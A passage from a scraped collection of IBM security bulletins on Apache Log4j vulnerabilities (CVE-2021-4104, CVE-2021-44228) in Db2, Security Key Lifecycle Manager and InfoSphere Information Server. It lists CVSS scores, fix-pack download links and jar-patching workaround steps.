Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWPVP\",\"label\":\"IBM Security Key Lifecycle Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.7**, 3.0, 3.0.1, 4.0, 4.1.0, 4.1.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T14:07:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j (CVE-2021-44228) vulnerability in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) and IBM Security Guardium Key Lifecycle Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T14:07:15", "id": "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "href": "https://www.ibm.com/support/pages/node/6527756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T23:33:34", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This bulletin covers the vulnerability caused when using versions of log4j earlier than 2.0. This version of the library is used by the ECM (Text Search) feature . CVE-2021-44228 is addressing a critical vulnerability in 2.0 <= log4j <= 2.15.0. covered in a separate security bulletin.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe ECM (Text Search Server) feature in all fix pack levels of IBM Db2 V10.5, V11.1, and V11.5 for all server editions on all platforms are affected. \n\nIBM Db2 V10.1 and V9.7 are not affected.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V10.5 FP11, V11.1.4 FP6, V11.5.6, and V11.5.7. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nFor ECM (Text Search Server)\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV10.5| TBD| [IT39390](<https://www.ibm.com/support/pages/apar/IT39390> \"IT39390\" )| Special Build for V10.5 FP11: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-aix64-universal_fixpack-10.5.0.11-FP011%3A316242174097101888&includeSupersedes=0> \"AIX 64-bit\" ) \n[HP-UX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-hpipf64-universal_fixpack-10.5.0.11-FP011%3A242482463941196672&includeSupersedes=0> \"HP-UX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-linuxia32-client-10.5.0.11-FP011%3A438028792052427520&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 
64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxx64-universal_fixpack-10.5.0.11-FP011%3A577009839975281408&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 big endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64-universal_fixpack-10.5.0.11-FP011%3A471210663573115712&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 big endian\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64le-universal_fixpack-10.5.0.11-FP011%3A775057095159355904&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linux390x64-universal_fixpack-10.5.0.11-FP011%3A600976767882452608&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sun64-universal_fixpack-10.5.0.11-FP011%3A994737637526172160&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Solaris 64-bit, 
x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sunamd64-universal_fixpack-10.5.0.11-FP011%3A161651527260272768&includeSupersedes=0> \"Solaris 64-bit, x86-64\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-nt32-client-10.5.1100.2866-FP011%3A170657316208346784&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-ntx64-universal_fixpack-10.5.1100.2866-FP011%3A230362976060813344&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n[Inspur](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-inspurkux64-universal_fixpack-10.5.0.11-FP011%3A512422001972300608&includeSupersedes=0> \"Inspur\" ) \n \nV11.1| TBD| [IT39387](<https://www.ibm.com/support/pages/apar/IT39387> \"IT39387\" )| Special Build for V11.1.4 FP6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-aix64-universal_fixpack-11.1.4.6-FP006%3A259848826141273472&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, 
x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-linuxia32-client-11.1.4.6-FP006%3A800049365576409728&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxx64-universal_fixpack-11.1.4.6-FP006%3A973220600195816448&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxppc64le-universal_fixpack-11.1.4.6-FP006%3A840967649574282368&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linux390x64-universal_fixpack-11.1.4.6-FP006%3A914289956995017856&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-sun64-universal_fixpack-11.1.4.6-FP006%3A248714336279646784&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Windows 32-bit, 
x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-nt32-client-11.1.4060.1324-FP006%3A435396118409714368&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-ntx64-universal_fixpack-11.1.4060.1324-FP006%3A887641715424039424&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little 
endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A830387863039344000&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.6 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.7: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134833_DB2-aix64-universal_fixpack-11.5.7.0-FP000%3A479485515202753152&includeSupersedes=0> \"AIX 
64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134832_DSClients-linuxia32-client-11.5.7.0-FP000%3A596706133826041984&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134831_DB2-linuxx64-universal_fixpack-11.5.7.0-FP000%3A137760201590747536&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134835_DB2-linuxppc64le-universal_fixpack-11.5.7.0-FP000%3A909787610102068096&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134834_DB2-linux390x64-universal_fixpack-11.5.7.0-FP000%3A651865390747364992&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134829_DSClients-nt32-client-11.5.7000.1973-FP000%3A855115844514252672&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, 
x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134830_DB2-ntx64-universal_fixpack-11.5.7000.1973-FP000%3A352392631134626240&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.7 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nIf you are using Db2 Text Search with rich text filters, after these special builds are applied, you will be required to upgrade your version of rich text filters in addition to Db2 Text Search. Appropriate rich text filters (in this case version 8.5.5) for each Db2 release can be downloaded from the Db2 accessories suite page.\n\nFor details, see [here](<https://www.ibm.com/support/pages/node/6527760> \"here\" ).\n\nFor Install (Installation Manager)\n\nWe recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nIt was determined through further investigation that while Installation Manager was found to not be impacted by CVE-2021-4104, as the Installation Manager does not use log4j in a manner that exposes the vulnerability, it does include the older version of the library. \n\nFor v11.1.x, install the Db2 fix listed in the table above for Linux 32-bit, Linux 64-bit, Windows 32-bit and/or Windows 64-bit. This fix replaces the existing log4j jar file with an empty jar file. While the vulnerability is mitigated with this fix, a scan will still show the existence of the jar file. 
Alternatively, you may download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nFor earlier versions, we recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\n## Workarounds and Mitigations\n\nFor ECM (Text Search): \n\n\nThe vulnerable jar can be patched to mitigate the vulnerability. \nNote: Do not stop or start the Db2 Text Search server if Db2 Text Search is not configured.\n\nOn Linux and Unix:\n\nStop the TextSearch server: \"db2ts stop for text\".\n\nRemove the JMSAppender.class file using either of the following two options. \nOption 1, using 'zip':\n \n \n zip -d log4j-1.2.17.jar org/apache/log4j/net/JMSAppender.class\n \n\nOption 2: if you do not have access to 'zip', you can also use the 'jar' command.\n \n \n #assume log4j-1.2.17.jar exists in current directory\n mkdir tmp\n cd tmp\n jar xvf ../log4j-1.2.17.jar\n rm org/apache/log4j/net/JMSAppender.class\n jar cvf ../log4j-1.2.17-patched.jar .\n cd .. \n rm log4j-1.2.17.jar \n ln -s log4j-1.2.17-patched.jar log4j-1.2.17.jar\n rm -rf tmp \n \n\nStart the TextSearch server: \"db2ts start for text\".\n\nOn Windows, the Java jar tool can be used from CMD to follow the same steps as the Unix jar instructions.\n \n \n Stop the TextSearch server: \"db2ts stop for text\" in the Db2 command line.\n Start the Windows CMD program and go to the SQLLIB\\db2tss\\lib directory which is found in the installation path e.g. \"cd C:\\ProgramFiles\\IBM\\SQLLIB\\db2tss\\lib\"\n Make a copy of the log4j-1.2.17.jar file e.g. 
\"cp log4j-1.2.17.jar log4j-1.2.17.jar.bak\"\n Make a new directory e.g. \"mkdir tmp\"\n Change to the new directory e.g. \"cd tmp\"\n Extract the jar file using the jar program found in the JDK that is in the SQLLIB\\java path e.g. \"..\\..\\..\\java\\jdk\\bin\\jar xvf ..\\log4j-1.2.17.jar\"\n Delete the JMSAppender.class file e.g. \"del org\\apache\\log4j\\net\\JMSAppender.class\"\n Package the files back into a new jar (note the 'c' for create, not 'x') e.g. \"..\\..\\..\\java\\jdk\\bin\\jar cvf ..\\log4j-1.2.17-patched.jar .\"\n Replace the log4j-1.2.17.jar with log4j-1.2.17-patched.jar, e.g. \"cd ..\", \"del log4j-1.2.17.jar\", \"ren log4j-1.2.17-patched.jar log4j-1.2.17.jar\".\n Clean up the \"tmp\" folder.\n Start the TextSearch server: \"db2ts start for text\" in the Db2 command line. \n \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-44228\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n31 Jan 2022: Added 10.5 links for Windows 64-bit and Windows 32-bit fix packs. \n31 Dec 2021: Added 10.5 links for AIX 64-bit, Linux 32-bit and Linux 64-bit fix packs. 
\n29 Dec 2021: Added 11.1.4.6 links for Windows 32-bit and Solaris 64-bit fix packs \n28 Dec 2021: Updated ECM Text Search section to reflect that: text search server should not be stopped or started if the customer is not using text search, and added the instructions to copy the patched jar in place of the original. \n24 Dec 2021: Removed the Install section from the impacted list, as further investigation determined that Installation Manager was not affected by this vulnerability, thus Db2 is not vulnerable from that dependency. Added 11.1.4.6 link for Windows 64-bit fix pack \n22 Dec 2021: Added 10.5 link for Inspur. Clarified server and client impact for each issue \n21 Dec 2021: Added 11.5.6 links for Windows 32-bit and Windows 64-bit fix packs. Added 11.5.7 links for Windows 32-bit and Windows 64-bit fix packs \n21 Dec 2021: Updated note that the 11.5.6 builds are the same as the one for CVE-2021-44228. Updated description of Db2 Text Search update. \n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"10.1, 10.5, 11.1, 11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-31T20:29:59", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-31T20:29:59", "id": "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "href": "https://www.ibm.com/support/pages/node/6528678", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nA vulnerability (Log4Shell) in Apache Log4j used by IBM InfoSphere Information Server was addressed. Various components in Information Server use Log4j to log messages for diagnostics. The fix upgrades log4j to version 2.16.0.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nInfoSphere Information Server, Information Server on Cloud | 11.7, 11.5, 11.3 \n \n \nInformation Server 11.5 and 11.3 are affected. 
Both releases are past end of service.\n\n## Remediation/Fixes\n\n_Product_ | _VRMF_ | _APAR_ | _Remediation/First Fix_ \n---|---|---|--- \nInfoSphere Information Server, Information Server on Cloud | 11.7 | [JR64358](<http://www.ibm.com/support/docview.wss?uid=swg1JR64358> \"JR64358\" ) | \\--Apply IBM InfoSphere Information Server version [11.7.1.0](<https://www.ibm.com/support/pages/node/878310>) \n\\--Apply IBM InfoSphere Information Server version [11.7.1.3](<https://www.ibm.com/support/pages/node/6498109> \"11.7.1.3\" ) \n\\--Apply Information Server [11.7.1.3 Service pack 1](<https://www.ibm.com/support/pages/node/6527912>) \n \n \nNote: \n1\\. You should also apply the fix for other components (WebSphere Application Server, Db2, etc.) in your environment. See the Related information section for relevant bulletins; however, it is best to check the [IBM PSIRT blog](<https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/> \"IBM PSIRT blog\" ) for any updated information from these components. \n2\\. The Update installer uses the **Updates folder** within your Information Server location to keep copies of files that are replaced during patch installs. The files in the Updates folder are used to roll back a patch installation; they are not needed while Information Server is used. Likewise, the **_uninstall folder** contains files that are only used while uninstalling Information Server components. \nFor log4j related patches, the prior vulnerable versions of log4j could be present in these folders. If you want to remove such files from the system, take a backup of these folders and then purge the folders. \nAn appropriate backup of the Updates folder must be restored before any subsequent patch rollback action. Likewise, an appropriate backup of the _uninstall folder must be restored before any subsequent uninstall action.\n\n## Workarounds and Mitigations\n\n**Note: \n1\\. 
The following steps can be done to mitigate the vulnerability. However, we strongly recommend applying the fix on top of 11.7.1.3.** \n**2\\. It is imperative that the mitigation or fix be applied as soon as possible.** \n3\\. The Update installer uses the **Updates folder** within your Information Server location to keep copies of files that are replaced during patch installs. The files in the Updates folder are used to roll back a patch installation; they are not needed while Information Server is used. Likewise, the **_uninstall folder** contains files that are only used while uninstalling Information Server components. \nFor log4j related patches, the prior vulnerable versions of log4j could be present in these folders. If you want to remove such files from the system, take a backup of these folders and then purge the folders. \nAn appropriate backup of the Updates folder must be restored before any subsequent patch rollback action. Likewise, an appropriate backup of the _uninstall folder must be restored before any subsequent uninstall action. \n \n \n**Steps:** \n \n \n1\\. **Applicability of the mitigation steps**: \n\n * These steps can be applied to any 11.7 or 11.5 or 11.3 installation.\n * If you have a Microservices tier (available since 11.7), follow the instructions in step 8 to mitigate the Microservices tier.\n\n2\\. **Script information**: \nTo mitigate the vulnerability, the JndiLookup.class must be removed from all instances of log4j 2.x jars. \nA UNIX script, iis-log4j-mitigation.sh, is provided to make it convenient to remove the class. After using the script, check the system for any log4j instances that contain the class. \nFor Windows, a PowerShell script, iis-log4j-mitigation.ps1 is provided. \nThere are other vulnerable classes in log4j 1.x 